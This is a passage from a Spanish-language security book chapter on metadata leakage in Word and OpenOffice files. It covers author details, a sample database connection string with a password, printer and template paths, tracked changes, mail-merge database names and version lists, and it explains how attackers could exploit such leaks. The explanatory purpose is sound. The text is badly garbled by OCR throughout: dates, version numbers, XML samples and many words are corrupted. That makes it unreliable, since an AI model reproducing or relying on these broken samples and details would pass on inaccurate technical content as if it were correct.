revision  history  -  Revision  #0:  Author  'el  usuario’  worked  on  'c:\Documents  and 
sett i ngs\us  uari o97\es  cr i tor i o\Doc01  -  doc ' 
company  -  LA  ORGANIZATION 
aragraph  count  -  1 
ine  count  -  1 

last  printed  -  200B-05-19TG9 : 36 : Q 
last  saved  by  -  EL  usuario 
character  count  -  225 
template  -  Normal 

creation  date  -  2008-05-19X09:21:0 

title  -  prueba  de  documento  de  Word97 

word  count  ^39 

page  count  -  1 

creator  -  el  USUARIO 

date  -  2 008-0 5 -19TQ9 : 46:0 

generator  -  Microsoft  word  3.0 


Imagen  01,13:  Metadatas  extra  idos  con  LibExtractor  do  un  doc  Word  97 . 


No  todos  estos  valores  estan  presentes  en  todos  los  formatos  de  archivo  y  su  aparicion  en  un 
documento  depen  de  tanto  de  la  version  del  formato  de  archivo  utilizada  como  de  la  version  de  la 
herramienta  que  se  esta  ulilizando.  Asi,  un  documento  creado  con  una  version  antigua  puede  tener 
todos  estos  metadatas  y  solo  se  modifican  algunos  de  cl  los  cuando  se  edita  el  archivo  con  una 
version  mas  moderna. 


Conexioncs  a  bases  de  datos 

En  algunos  casos  lambien  pueden  obtenersc  dates  mucho  mas  sensibles  para  la  seguridad  de  una 
organ izaci on,  como  es  el  caso  de  las  conexiones  a  bases  de  datos,  En  la  imagen  01.14  aparece 
una  consulta  SELECT,  los  nombres  de  los  drivers  ODBC  usados,  el  nombre  del  servidor  don  de  se 
almaeena  la  base  de  dates,  el  propio  nombre  de  la  base  de  datos  y  la  cuenta  de  acceso  utilizada  para 
extraer  los  datos...  y  tambien  la  contrasena. 

Estos  documentos  deberian  tener  una  proteccion  especial  dentro  de  las  empresas,  ya  que  almacenan 
credenciales  de  forma  muy  comun  y  son  un  autentico  riesgo  de  seguridad  a  tener  cn  cuenta. 
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Imagen  01.1 4:  Information  sobre  conexion  a  base  de  dates  en  un  documento  de  Word. 


El  texto,  para  mayor  elaridad,  es: 

SELECT  pruebas_Q .  apellidos r  pruebas_0 .  nombre ,  prue-bas  O.tlf  FROM 

pruebasmetadata.pruebas  pruebas  0 

DA  TABA£E=pruebasmet&da ta 

DRIVER=  (MySQL  ODBC  3.51  Driver }  QPTXQN-0 

PWD= Pa s 5 Me t a DA TA 

PCRT=Q  SER VER-a er vidor 

U I D-Ua v a ri  oMe t a DA TA 


Impresoras 

^a  hemos  comprobado  previamente  como  el  historial  de  revisiones  nos  proporciona  informacion 
sobre  tiombres  de  cuenfas  de  usuario  y  de  scrvidores  de  carp  el  as  compart  idas,  Giro  date  oculto  en 
algunos  documentos  que  puede  revelar  informacion  sobre  nuestros  sistemas  informaticos  son  los 
n  ombres  dc  inipresora  que  quedan  aimaccnados  como  informacion  oculta  dentro  de  los  documentos 
al  formatear  la  pagina  para  impresion.. 

Las  i  nip  res  ora  s  compariidas  aparecen  en  formate  UNC,  Universal  Naming  Service,  por  lo  que  si 
la  inipresora  con  la  que  se  esta  trabajando  es  de  red,  revelara  el  nombre  del  servidor,  del  recurso 
companido  y,  en  ocasiones,  incluso  la  direccion  IP  del  servidor,  proporcionando  irt  formation  del 
direccionamiento  intemo  de  la  red  que  podra  ser  utilizado  para  por  ejemplo,  hacer  un  escaneo  de 
registros  PTR  en  el  servidor  DNS  principal  de  la  organization  en  un  ataque  complete. 


Capita lo  I.  Los  Metadatas 


29 


Imagen  01.15:  Datos  de  impresora  en  un  documcnto  de  Word 


Esta  information  es  muy  valiosa  por  si  misma  para  un  atacante  porque  permite  descubrir  information 
sobre  las  ACLs  de  la  red,  ya  que  si  un  usuario  esta  usando  una  impresora  signified  que  tiene  aceeso 
al  reeurso  y,  par  supuesto,  que  el  usuario  es  valido  en  el  servidor. 


Imagen  01.16:  Impresora  en  formato  UNC  en  un  documcnto  dc  Word. 
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Las  versiones  poster!  ores  a  Microsoft  Office  95  no  sue  ten  ineluir  esta  inform  aci6n  en  I  os  fieheros 
creados.  Pero,  curiosamente,  si  la  actual  izan  cuando  la  encuentran  en  un  documento,  haciendo 
constar  el  nombre  de  la  impresora  que  tengamos  en  uso.  Este  comportamiento  hace  que  doeumentos 
heredados  que  se  han  Ido  modificando  con  diferentes  versiones  sigan  conservando  y  actual  izando 
este  date.  No  hace  falta  siquiera  imprimtr  los  doeumentos  o  contigurar  su  impresion:  basta  eon  una 
simple  edicion  y  guardado. 


Metadatos  en  OpenOffice 

OpenOffice  utiliza  de  forma  nativa  el  formate  ODF  (Open  Document  Format),  un  formato  estandar 
y  abierto  definido  por  OASIS  y  aprobado  por  ISO.  En  ODF ,  los  doeumentos  se  almacenan  corno  un 
archivo  comprimido  ZIP  que  contiene  un  conjunto  de  fieheros  en  formato  XML  con  el  eontenido  del 
documento. 

As!,  si  se  utiliza  un  programa  de  compresion  para  abrir  un  documento  ODT  (fie hero  de  texto  creado 
con  OpenOffice  Writer)  nos  encontramos,  entre  otros,  con  los  siguientes  archives: 

-  metaXML:  Contiene  metadatos  relatives  al  documento  y,  como  se  indica  en  la  ayuda  del 
producto,  este  fichero  no  se  cifra  ni  siquiera  cuando  el  documento  este  protegido  mediante 
eontrasena. 

-  settings. XML:  Incluye  information  relativa  a  la  configuration  y  a  los  ajustes  del 
documento. 

content. XML:  En  este  fichero  se  almacena  el  eontenido  principal,  cs  dec  in  cl  texto  del 
documento. 


fmagen  01.17:  Contenido  de  un  documento  ODT. 
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Aunque  la  version  de  OpenOffice  l  utiliza  extensiones  de  archivo  distintas  a  las  de  OpenOffice  2 ,  los 
documentos  son  guard  ad  os  de  forma  similar  No  hay  que  olvidar  que  DDF  se  construyo  como  una 
evolucion  de  los  formatos  de  fichero  utilizados  en  OpenOffice  !. 

Datos  personales 

Los  primeros  metadatas  que  genera  un  usuario  utilizando  OpenOffice  se  crean  durante  el  proceso 
de  la  instalacion  del  software  y  a  su  vez  la  primera  vez  que  se  ejecuta  la  aplicacion.  La  suite  solicita 
al  usuario  una  serie  de  datos  que  por  defecto  van  a  acompanar  a  los  documentos  creados  con  esa 
version  del  software  desde  ese  momento  en  adelanie,  hasta  que  se  cambien. 

OpenOffice  va  a  almacenar  esta  informacion  de  tbrma  que  pueda  aeompanar,  com  o  una  firm  a 
reconocible,  a  los  documentos  generados  desde  ese  software.  No  obstante,  todos  estos  datos,  y  mas 
intbnnacion  aim,  pueden  ser  modificados  y  ampliados  posteriormente  modificando  las  preferences 
del  paquete  OpenOffice,  utilizando  para  ello  el  euadro  de  Opciones  que  se  eneuentra  dentro  del  menu 
Herramientas. 


Finagen  0 1 , 1 8:  Modification  dc  tos  datos  de  usuario. 

Parte  de  esta  i n form ae ion  que  puede  verse  se  va  a  almacenar  en  los  documentos  generados  con 
OpenOffice  sin  necesidad  de  seleccionar  ninguna  opcion  para  ello.  De  esta  forma,  si  creamos  un 
nuevo  documento  de  texto  y  comprobamos  el  contenido  del  fichero  metaXML  contenido  en  el 
archive  comprimido  ODF  que  se  ha  generado,  encontraremos  la  informacion  que  se  muestra  en  la 
imagen  01.19,  donde  puede  verse  que  se  incluye  el  nombre  y  los  ape! lidos  del  usuario,  la  version 
de  OpenOffice  v  el  sistema  operative  concrete  que  se  ha  utilizado  para  la  creacion  y/o  edicion  del 
presente  archivo. 
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<?xral  version-”  l.e"  encoding^UTF-S"  ?> 

-<office :  doc ument -met a  xmlns  : off  Ice=‘Tutm : oasis :  names : tc : opendoc ument : xsilns : of f ice :  1 . e*1 
vmlns ;  xlink="littp :  / /uww .  w3  .org/1339/xlink"  xml  as  :  dc ="bt  tp :  //purl  .org/dc /element  5/ 1 . 1/  " 
xmlns :  met  a=“  urn ;  oas  i  s :  names :  tc :  apendoc  ument :  xml  ns  rmeta :  1 .0“ 
xmlnsiOOO="http://openoff  ice.org/2004/off  ice"  off  ice:  version^l 
-  < office :reeta> 

<meta :  genera  to  r>OpenQff  ice.  org/2  » 3$Wi  n32  OpenOf f  ice _ or  g_pro  j  ect  / 68€kn5 $Build  - 
9 2  2 1<  /  met  a : generato  r  > 

<met  a :  i nitial-creator >MiNombre  MiApel 1  ido<  /meta :  initial  -creator? 

«neta :  c  reat ion -d ate >  2008  -06  -  11T1 1 : 33 :  Z3</mete  :  t  reat ion- date > 

<met  a :  ed  iting -eye  les  >0<  /met  a :  edit  irtg-  eye  les> 

<met  a : ed iting-durat ion  >PT0S<  /mete : ed it ing -d  ur at ion> 

<meta : user-defined  «eta : name=" Info  a."  /> 

<met  a :  user-defined  met  a :  name^"  info  2"  /> 
oneta:  user -defined  meta :  name="Info  3"  /> 
cmeta  t  user-defined  uieta :  name="info  4"  /  > 

<meta:docLBsent- statistic  met  a :  table-  c  our»t= “0  “  met  a  s  image- count ="0"  :  object -count ="0* 

siet  a :  page  -  counts  “  1“  meta :  paragraph- count =,le"  mats  ;word-count=”0"!  mets :  character-counts-'®"  /> 
</office:meta> 

</ office: document -mets> 


lmagen  01. 19:  Fichero  metaJCML, 


Impresoras 

Como  ya  vimos  on  la  section  anterior,  entre  la  information  que  puede  ser  potencialmente  peligrosa, 
pues  revela  datos  sobre  la  infraestructura  de  una  empresa,  esta  la  relativa  a  las  impresoras.  Asi, 
cuando  se  imprime  un  documento  con  OpenOffice,  y  posteriormente  es  guardado,  dentro  del  fichero 
settings  XML  queda  la  infonnacion  de  la  impresora  que  ha  sido  utilizada* 


<  c  onf  i  g :  conf ig-  it  en  conf  ig :  n  3 "  C 1  i  pAsCh  a r  a  c  terAnc  bo  redNT  it  e  r  F  lyF  r  ame  s  " 
conf  i  g :  ty  pe= "  bool  e  an"  >  f  a  Is  ec  /  c  onf  ig :  conf  ig-  item> 

<  config:  conf  ig- item  conf  ig:naifle="Current0atdbas®3ta5OLjrce"  corvfig:type="  string"  /> 

<  conf  ig :  c  onf  ig  -  item  conf  i  g :  narae=  "  DoWotC  a  pt  uret>r  awob  j  sonPa  g  e  " 
conf  ig :  type^"  bool  e  an"  >f  alset  /  conf  ig :  conf  i  g-  ite«t> 

<conf  ig :  conf Ig-itera  conf  ig :  nasf^^TableRowKeep"  conf  ig :  type  ^boolean"  >fa  1  sex  /  conf  ig :  conf  ig- 
ite®> 

xconfig: c onf ig- item  conf  ig:nacie= "Printers  arae"  c  onf  ig:type="  string"  >\\servidor\HP  2®90C 
</conf ig : conf ig- item> 

xconfig: conf ig- item  c  onf  ig:nane="P  riot  FaxNsme"  config:type=  "string”  /> 

<  conf  i g :  c onf  ig-item  c onf  i g :  n ame -  "Cons  i do rie xtN rapenobj  ms  " 
conf  ig :  ty  pe="  boolean"  >f  alsec  /  conf  ig :  conf  ig-  iten> 

<config:config-item  config:  ^>al!^e=nuseoldP^inte^«et^ics,, 
c  onf  i  g :  types  "  boo  lean"  >f  3 1  sex  /  conf  ig :  t  onf  ig-  item  > 


lmagen  01.20:  InformacnSri  de  una  impresora  en  un  servndorde  red. 


Plantillas 

Las  pi  anti  11  as  se  utilizan  para  generar  documentos  con  estilos  y  formatos  predefinidos.  Esta  forma 
de  trabajar  es  muy  utilizada  ya  que  ahorra  trabajo  y  permite  utilizar  documentos  con  imagenes 
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corporativas  de  forma  cdmoda.  Sin  embargo,  cuando  se  genera  un  documento  a  partir  de  una  plantilla, 
el  documento  almacena  referencias  a  la  ruta  de  ubicacion  de  la  plantilla  en  el  archivo  metaXML. 

<>ml  versions" 1.0"  encoding^'UTF-3"  ?>  " 

-  coff ice : document -me ta  xibIfis : off ic  fr="urn : oasis : names : tc  :opendoc ument : xmlns : office :  1 , 0“ 
xalns :  xlink=H  http :  //**«.  *3  .org/1999/xlink"  x*lns :  dc="tittji:  / /  pur  L  .org/de/eleKrvts/i .  1/  ■ 
xffllns :  metasM  ur n :  oasis :  pames:  tc :  opendoc  usnerct :  xsslns  :rceta :  i  .e" 

soalns : ooo="  http :  /  /ope naff ice .  org/  2804/of  f  ice*  office ;  vers  ior>="  1 .  €T  > 

-  <office:sneta> 

<meta :  generatorKSpenCf  f  ice .  org/  z.  3$wirB2  OpenOf  f  ice .  org_project/680!R5  iBui  Id- 
322i</*nef  a :  generator* 

<dc :  t  itle*MuevaPl&nt  Illac/dc :  title* 

<»eta :  initial  -creat  or  *MiHombre  Hi  Ape  llido</ met  a:  Initial-  creator* 
cj&eta :  c  reation-daf  e>  2088 -©S-IZTifl:  02  :i4</meta:  creation -date* 

<jneta :  editing-cyc  les>l</«eta :  edit  ing-  cycles  > 

cmeta :  edit  ing-  durst  ion*  pres  c/meta :  editing- duration* 

ciaet  a:  template  xlink:type=" simple"  xlink: actuates"  on  Request" 

xlink :  href=" /Datos5S20de%20progr  ama  /OpenOf  f  i  ce,  org  2/  u  ser  / 1  erepl  at  e  /Nu  eva  Plan 
tills -ott"  xlink:titles"MuevaPl anti  11a"  (ueta: date- "2003 -03 -12T10: 82: 14"  /> 

<meta: user-defined  meta:na»e="mfo  1“  /> 

<meta:  user-defined  «eta:name=" Info  2"  /> 

<  met  a :  user-def  i  ned  me  t  a :  name = "  info  3"  /  > 

<a»eta :  user  -defined  met  a :  names"  info  4"  /  * 

<  meta :  doc  uffient- statistic  meta:table-courrt-"e"  met  a:  image -counts"©"  meta:  object -counts"©" 
mete:  page  -counts"!"  met  a:  paragraph- count  ©eta  :i*ord- counts"©"  metacharacter-counts*©"  /> 

</office:»eta> 

<  /off!  c  e :  doc  uwie  nt  -  met  a  > _ _ 

Imagen  01.21:  Ruta  de  acoeso  a  la  plantilla. 


Como  se  puede  apreciar,  en  el  archivo  met  a  XML  aparece  la  ruta  de  la  plantilla  relativa  a  la  ubicacion 
del  documento.  Esta  ruta  puede  parecer  inofensiva  y  falta  de  informadon  que  ponga  en  riesgo  la 
seguridad  del  sistema,  sin  embargo,  si  la  plantilla  hubiera  sido  almacenada  en  una  earpeta  situada 
fliera  del  perfil  del  usuario,  la  ruta  ofreceria  informadon  sobre  una  cuenta  de  usuario  del  sistema. 


<»eta :  template  x 1 ink :type=" simple”  xlink: act uate="GrtRequest" 
xlink: href=" . .  /Doc  ui&ervts%2Sand%2esettings/tyentaUsuario/OBtos%20de%20prog  rams /openoff  ice.org 
/  user/ template/fiuevaPlant  ilia .  ott  ”  xlink :  tit  le="  NuevePlarat  ilia"  met  a :  dates  *  2003-03- 1 2T3© :  02 : 14" 

/> 

cmeta : user-defined  meta : names" info  1"  /> 


imagen  01.22:  Ruta  a  plantilla  con  information  tie  cuenta  de  usuario. 


En  el  caso  de  la  imagen  01.22,  el  documento  ha  sido  altnacenado  en  “C:\”  y  como  resultado,  la 
ruta  de  la  plantilla  nos  revela  la  earpeta  que  eontiene  el  perfil  del  usuario,  dentro  de  “ C:\Documents 
and  Settings”.  El  nombre  de  esta  earpeta  normalmente  es  el  de  la  cuenta  dc  usuario,  en  el  ejemplo 
“Cuenta U suario”.  Se  debe  destacar  aqui  que,  en  algunas  ocas  i  ones,  el  nombre  de  esta  earpeta  eontiene 
tambien  datos  relatives  al  dominie  a  I  que  pertenece  el  usuario,  Esta  informadon  se  presenta  en  el 
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nombre  de  ia  carpeia  del  perftl  del  usuario  con  la  estructura  L "NombreDe Cuenta.NombreDeDom inio" 
ofreciendo  informaeion  mucho  mas  reveladora  a  un  posible  atacante.  Igualmente,  el  documento 
podria  haber  sido  guardado  en  otra  unidad  distinta  a  la  de  la  plantilla,  obteniendose  en  ese  caso  una 
njta  completa  que  identifica  la  unidad  de  disco. 


cm  eta  item  plate  xlink:type= "simple"  xli  n  k;  actu  ate =Ji  on  Request" 
xlinki  href=H 

|,T  x link: title ^"NuevaPI anti lla"  meta: date 2008-08- 


12T10:02:147> 

<  meta:  user-defined  meta:  name  ="Info  1"  /> 


Imager*  01.23:  Rula  a  pi  anti  I  la  con  unidad  de  disco. 


En  los  ejemplos  que  se  han  mostrado,  los  resultados  son  todos  desde  maquinas  de  trabajo  Windows 
pero  el  resultado  no  difiere  nmcho  en  las  maquinas  Linux.  En  este  caso,  las  rutas  a  los  perfiies  pueden 
contener  la  ruta  al  SHOME  del  usuario  y  este  puede  quedar  al  deseubierto. 


<«eta: template  xlink:  typers  irople"  xlink: Bctuate=”onRequest"  xl ink : role^* template" 

xl  ink:  href  ^"/bowie/pruebas/.openoff  ice.  orgl/ user/ teiftplate/ Plant  illal*ieva.ottM 
xl  Ink  :title="iiy^v3Plant  ilia"  raeta  :dBte=Ff20B8-06-3erfl9:i3:2eIT  /> 

<«eta: user- defined  meta :  nawe^Info  1”  /> 


fnicigen  01 .24:  Usuario  Pruehas  en  ruta  a  plantUla. 

Logieamente,  si  el  documento  se  encuentra  ubicado  en  un  servidor  de  red,  la  informaeion  que 
aparecera  en  formate  VNC  mostrara  el  nombre  del  servidor  y  la  unidad  compartida  pemiitiendo  de 
nuevo  a  un  posible  atacante  recomponer  el  mapa  de  la  red  de  la  organ izacidn. 


Documentos  vinculados  e  incrustados 

Una  de  las  opciones  que  aportan  casi  todos  los  programas  ofimaticos  actuales  es  la  de  vincular 
c  incrustar  documentos  completes  o  secciones  de  documentos  procedentes  de  otras  aplicadones. 
Esto  puede  ofrecer  un  punto  de  fuga  de  dates  no  deseados  diiicil  de  controlar  para  una  empresa  o 
particular  a  la  hora  de  enviar  o  publicar  un  documento  ofimatico. 

En  el  caso  de  la  vinculaeion  de  arcliivos,  en  el  documento  principal  aparecera  una  referencia  al 
documento  vinculado,  en  forma  de  ruta  relativa  siempre  que  sea  posible  y  como  ruta  absoluta  a  la 
red  cuando  no  quede  otra  alternative  para  referenciar  correctamente  la  ubicacion  del  archivo. 

Cuando  el  documento  vinculado  se  encuentre  en  el  mismo  equipo  que  el  documento  principal,  los 
resultados  scran,  en  general,  similaies  a  los  mostrados  en  el  apartado  de  plantillas,  pudiendo  llegar  a 
revelar  informaeion  sensible  sobre  cuentas  de  usuario  o  ubicaciones  de  archivos. 


Capitulo  L  Los  Metadatas 


Si  el  documento  vineulado  esta  almacenado  en  otro  equipo,  la  informacion  revelada  tambien  seria 
muy  util  para  un  posihle  atacante,  pues  el  reeurso  apareeeria  en  forma  UNC  desvelando  dates  de  la 
estructura  interna  de  la  red  de  la  organizaeion. 


<  text :  p  t  ext  :  style  -  name = 1 "  st  ends  rd 11  > 

<draw:frame  draw: style -naeie="fpi"  draw: name =wgrafieosl"  t ext : 3 ne ho r -types" paragraph” 
svg:width=“l6.S9&CH"  svg:  heights.  H9ca"  dr3w:z-irtdex=I19"> 

<draw:  image  xlink:href =V /desktop/ confide nciales/Dibu  jo,  bmp"  xlink:type=  "simple" 
xli :  s  how**1  embed  "  xl ink: actuate -wiLoad"  draw  filter  ~naf&*"<To4o5  los  formates >"  /> 
</drsw:frafne* 

</text : p> 


Imagen  01.25:  Ruta  a  equipo  remoto. 

En  el  easo  de  qtie  el  archive  haya  sido  incrustado  en  el  documento  ya  no  apareceran  estas  nit  as, 
pero  entonces  hay  que  afrontar  nuevos  posibles  problemas  de  fuga  de  informacion  en  todos  los 
documentos  incrustados,  ya  que  estos  pueden  contener,  a  su  vez,  metadatas  e  informacion  oeulta 
dentro  ahora  del  documento  principal. 

Supongamos  que  se  incrusta  en  un  documento  ODTuna  imagen  JPG  que  llcva  asociados  metadatas 
en  formato  EXIF.  Uno  de  esos  metadatas  es  una  miniatura  que  de  apariencia  distinta  a  la  de  la 
imagen,  lo  cual  demuestra  que  esta  ha  sido  manipulada. 

Todos  los  arch i vos  incrustados  se  encuenlran  dentro  del  documento  maestro,  por  lo  que  abriendo  el 
fichero  ODT  con  un  descompresor,  se  puede  ver  que  existe  una  carpeta  denominada  Pictures  y  que 
dentro  de  ella  se  cncuentra  la  imagen  incrustada,  aunque  con  otro  noinbre. 


Imagen  01.26:  Imagen  inerustada  en  carpet  Pictures. 

Si  la  imagen  es  extraida  y  analizada  puede  verse  que  mantiene  todos  los  metadatas  de  la  imagen 
original  y,  por  supuesto,  la  miniatura  que  muestra  el  estado  original  de  la  fotografia. 
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Imagert  01 .27 :  Metadatas  EXIF  en  archive  incrustado. 


Modificaciones 

Una  de  las  caraeteristicas  que  ofrece  OpenOffice  Writer  es  hacer  un  seguimiento  de  los  cam  bias 
que  sufren  los  documentos.  Esto  es  muy  util  cuando  un  doeumento  esta  siendo  elaborado  por 
varies  usuarios  o  cuando  se  desea  conocer  todas  las  acetones  realizadas  en  el  mismo.  El  submenu 
“Modificaciones *  del  menu  "Editar”  permits  aetivar  esta  car  acted  stica,  asi  coino  hacer  visibles  u 
ocultar  los  cam  bios, 

Por  descuido,  se  puede  estar  trabajando  con  un  doeumento  que  tiene  esta  opcion  activada,  pero  la 
visualization  de  la  h  errand  enta  no  nos  esta  mostrando  los  cambios,  con  lo  que  si  esc  doeumento  es 
enviado  sin  eliminar  la  historia,  cualquiera  que  acceda  a  este  archivo  podra  leer  informacion  que  tal 
vez  no  es  deseable,  como  saber  si  se  ha  eliminado  algo,  si  se  ha  anadido  y  quien  y  cuando  fueron 
rcalizados  esos  cambios. 


Imagen  0L28:  Doeumento  con  la  visuali/acion  de  cambios  de&aclivado. 
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Iraagen  0  3 .29i  Documento  con  la  visualizacion  dc  cambios  activado. 


loda  esta  informacion  relativa  al  historial  de  cambios  qucda  guardada  en  el  archivo  content. XML. 


<text :  trac  teed  -  c  harvges  > 

<text: changed -region  text: id=nctllfl732472"> 
ctext: deletions 
<office: change -info 

<dc :  creator>MiMombre  MiApe 1 1  i do< / d c :  creator> 

<dc :  d  ate  >  200B  -08  -  13T13 :07 ;  00<  /dc :  date> 

<  /off  ic  e :  c  hange  -  info 

<text:  p  text: style -narae=”Standard">lareeirtableraente  patetica</text:p> 
</text:deletion> 

< /text :  c  hanged  -  region* 


Tniagen  01.30:  Historial  de  Cambios  cn  content. XML, 


Parrafos  ocultos 

Otra  curiosa  opcion  que  ofrece  OpenOffice  es  la  de  ocultar  texto  o  parrafos.  Hsto  pemiite  a  personas 
que  estan  trabajando  sobre  un  documento  tener  una  visual izacion,  con  parrafos  ocultos,  preparada 
para  imprimir,  y  otra  visual  izacion.  con  parrafos  visibles,  con  informacion  para  la  edicion  del 
documento.  Esta  earaetenstica  sc  activa  incluyendo  un  campo  especial  en  el  parrafo. 

Posteriormente  podemos  activar  o  dcsactivar  la  visualization  de  todo  el  texto  oculto  mediante  la 
correspond iente  opcion  del  menu  ‘’Ver"  o  cambiando  la  condicion  que  se  indico  anteriormente 
cuando  se  oculto  el  texto.  Asi,  si  tenemos  un  documento  con  parrafos  ocultos,  pero  no  tenemos 
activa  la  opcion  dc  verlos,  oblcndremos  una  visualizacion  quo  no  muestra  toda  la  informacion  que 
tiene  el  documento. 
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Notas,  Encahczados,  Pics,  Comentarios... 

En  un  documento  con  formato  OpenOffice  existen  un  buen  numero  de  sitios  en  los  que  se  puede 
introducir  informacion  que,  en  posieriores  revisiones,  pucda  pasar  desapercibida  al  ojo  humane. 
For  ejemplo,  en  encabezados  o  pies  de  paginas,  anotaciones  a  pie  de  pagina  o  documento,  o  en  las 
notas  en  Hnea  o  comentarios  que  pueden  ser  introducidos  utilizando  la  opcion  “Notas”  del  menu 
“Insertaf  \ 

Estas  notas,  salvo  que  se  especifique  lo  contrario,  no  se  incluyen  a  la  bora  de  imprimir  o  exportar 
el  documento*  per  ejemplo  a  un  formato  PDF \  por  lo  que  es  facil  que  no  sean  detectadas  en  las 
revisiones.  Hay  que  tener  en  cuenta  que  ineluso  algunos  cuadros  de  texto  y  otros  elementos  pueden 
estar  definidos  como  “no  imprimibJes,',  con  lo  que  una  revision  de  un  documento  no  deberia  limitarse 
a  su  lectura  en  formato  impreso. 


Imagcn  01.31:  Definition  de  Marco  de  Texto  Imprimible  o  No  lmprimible. 


Metadatas  personalizados 

En  OpenOffice ,  el  usuario  liene  tambien  la  posibilidad  de  incluir  metadatos  personalizados  en 
sus  documentos  y  asf  extender  aiin  mas  la  meta-  informacion  relativa  al  content  do  del  documento 
utilizando  para  ello  la  opcion  dc  “Pmpiedades”  dentro  dc  la  lista  de  elementos  del  menu  “Archivo” 
de  la  aplicacion* 


Capttulo  1.  Los  Metadatas 
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Ademas  de  los  metadatas  personal  izados,  e!  documento  podria  almacenar  informacion  on  su 
descripcidn,  lo  que  puede  ser  un  dato  perdido  si  un  documento  es  creado  desde  otro  fichero  anterior, 
lo  que  provocara  que  sea  heredada  esta  informacion  del  documento  original. 


Imagen  01 .32.  Metadatas  personalized  os. 


Bases  de  datos 

Una  de  las  caractensticas  mas  importantes  que  ofrecen  los  documentos  ofimatieos  es  la  posibi  lidad  de 
generar  mode  los  que,  eombinados  eon  bases  de  datos,  perm  i  ten  generar  documentos  personal  izados 
de  forma  automatizada.  Estos  modelos,  especialmente  disenados  para  la  combinacion  de 
correspondencia,  deben  ser  objeto  de  especial  consideracion,  ya  que  eontienen  informacion  que 
permite  describir  la  base  de  datos  de  la  que  toman  la  informacion.  Toda  la  informacion  relaiiva  a  la 
combinacion  de  correspondence,  y  por  tanto  a  la  base  de  datos,  puede  ser  encontrada  en  el  arehivo 
settings. XML.  En  el  aparece  informacion  sobre  el  nombre  dc  la  base  de  datos  y  la  tabla  utilizada  para 
la  combinacion. 


<  conf  ig :  conf  ig- it  conf ig:  name="CurrentDatal>aseCr3t3ScL[rc^" 

conf ig ;  types  "  string”  >  Ref  erercci  as  <7conf  ig :  conf  ig-  item> 

<  c  onf  i  g :  conf  ig  -  it  ew  conf ig :  rtaine=  "Cu  r  rentoat  a  ba  s  eC  am  a  rKlrype  " 

cortf  ig :  /conf  ig:  conf  ig-  iterc> 

<  c  onf  i  g :  conf  i  g  -  i  tesi  conf  1  g :  n  3*ne=  “  C  urre  rvtoat  a  ba  s  c-Corots  nd “ 
conf  ig  ;type=fl  string"  >Contactos</corif  ig :  conf  ig  -  iten* 

<  conf  ig:  conf  ig-  item  conf  ig:  name =ri  Printer  swings"  conf  ig:type= "boolean"  >true</ conf  ig:  cGnfig~ite*i> 


l mage n  01.33:  Informacion  de  la  base  de  datos  en  settings 
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Y  en  el  archivo  content  XML  es  almacenado  el  nomhre  de  la  base  de  dates,  la  tahla  y  los  campos: 

-  text  :jj  text :  style -najne=“  Standard"} 

<text:  list  abase- display  text:table-nanie="Conta<:tcrs"  text  :table-type=“ table*'  texticoluBWi- 
naJl^e=*'TK)rabre,'  text :  database -naoie=”Re-f  er  entiss "  xmonbrex  /text :  database-display > 

</text:p> 

ctext :  p  text :  style  -  naRie=  "Standard"  > 

<  text:  data  base- display  text:table-n^fnre=MCorjtactosM  text:  table- type- "table"  text:colusmv 
name = ”di  i  re  c  cion”  text : databa  se-nai3e^,,R.e'f  ereficias11  >< direct  ionx/text :  database-display > 

< /text :p> 

<text :  p  text :  style-  n ante=  " St sHturcT  > 

ctext: database-display  text : table -naine=”Contacto s'1  text: table- type- “table"  text:  caiman - 
na«e^  "cl  ave  "  text :  dat  a  ba  se  -  rvaifte = "  R  ef  erenc  las  *  ><  cl  ave>  c  /  text :  databa  s  e  -di  s  pi  ay> 


Itnagcn  01.34:  Inform  acibn  de  campos,  lab  I  as  y  base  de  dates  en  content,  XML, 

Sin  embargo,  como  puede  observar.se  en  estos  archivos,  la  informacion  relativa  a  la  eonexion  a  la 
base  de  dates  no  se  encuentra  en  el  documento  DDF.  Esta  informacion,  que  podia  mostrar  la  ruta  a 
un  fichero  de  bases  de  datos  o  las  credenciales  para  un  servidor,  se  almacena  en  tin  archi  vo  del  perfil 
del  usuario  llamado  Data  Access. xcu  que  debe  ser  objeto  de  especial  proteccion  per  parte  del  usuario 

C:\  Documents  and  Settings\  CUENTA_DE_USUARIO\  Dalos  de  programs  \  OpenOffice  .  org2\ 
user  \  registry  \  data\  org\  OpenOffice\  Office  \  DataAccess .  xcu 

Apesar  de  que  no  se  publiquen  los  credenciales  de  ia  eonexion  a  la  base  de  datos,  la  informacion  que 
almacena  el  documento  podria  ser  suficiente  para  ayudar  a  un  posible  atacante  a  preparar  ataques  a 
la  BBDD ,  bien  direct  os,  bien  a  traves  de  tecnicas  de  SQL  injection  sobre  la  Web  corporativa* 

Versiones  de  doeumentos 

A I  ignai  que  ottos  paquetes  ofimaticos,  OpenOffice  permite  guardar  distintas  versiones  de  un  mismo 
documento,  Esta  caracteristica  es  de  gran  utilidad  en  entomos  de  trabajo  cooperative,  pues  permite 
evaluar  la  forma  en  que  el  documento  ha  sido  modificado  y,  si  fuera  necesario,  reeuperar  el  estado 
anterior  tras  una  manipulation  incorrecta.  Dentro  del  menu  “Archivo”  se  encuentra  la  option 
“Versiones”  que  permite  guardar  la  version  actual  del  documento  o  establecer  la  action  a  realizar 
cada  vez  que  se  trabaje  con  el,  permitiendo  guardar  una  nueva  version  cada  vez. 


Imagen  01 35:  Versiones  de  documento. 


Cap  hid o  1.  Los  Metadatas 
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Dentrode  un  documento  ODF  que  condone  distintas  versiones  anteriores  guardadas  se  puede  encontrar 
dos  focos  importantes  de  informaeion.  En  primer  lugar,  un  archive  1 1  am  ado  VersionListXML  con 
infonnacion  sobre  quien  guardo,  y  cuando  lo  hizo,  cada  distinta  version, 

<?xanl  versi<m="l.e"  -s"  ?> 

<  VL ;  vers  ior^  list  ns :  <te = "  http :  // pur  1  -  arg/dt/  element  s/  x .  1/  “ 

XBBlns :  VL= 11  http : //opzwrff  ice.  a rg/ 2001/ versions -list”  > 

<  VL :  ve  r  s  ion  -  entry  VLr  titles”  Vers  ioni’1  VL:co*nient="  Vers  Ion  guardada  automat  icaaente" 
VL.:creator="fliJic*ibre  ftiApellido"1  efc :  date-ti*ne=',2&&8-0s-i3T0B: 39: 22"  /> 

<  VI :  version -entry  VL  :title="Version2n  VL:cofWient  Aversion  guardada  airtoma  tic  ament  e" 
VL:creator="MlM(»bre  PU/pellitio"  dc:c^ate-ti^Be="206S^-l3T00:4l:53,,,  /> 

</ vl : vers ion -list> 

Imagen  01,36:  Archive  Vers to n L is t  JCMI^  con  infonnacion  dc  las  versiones. 


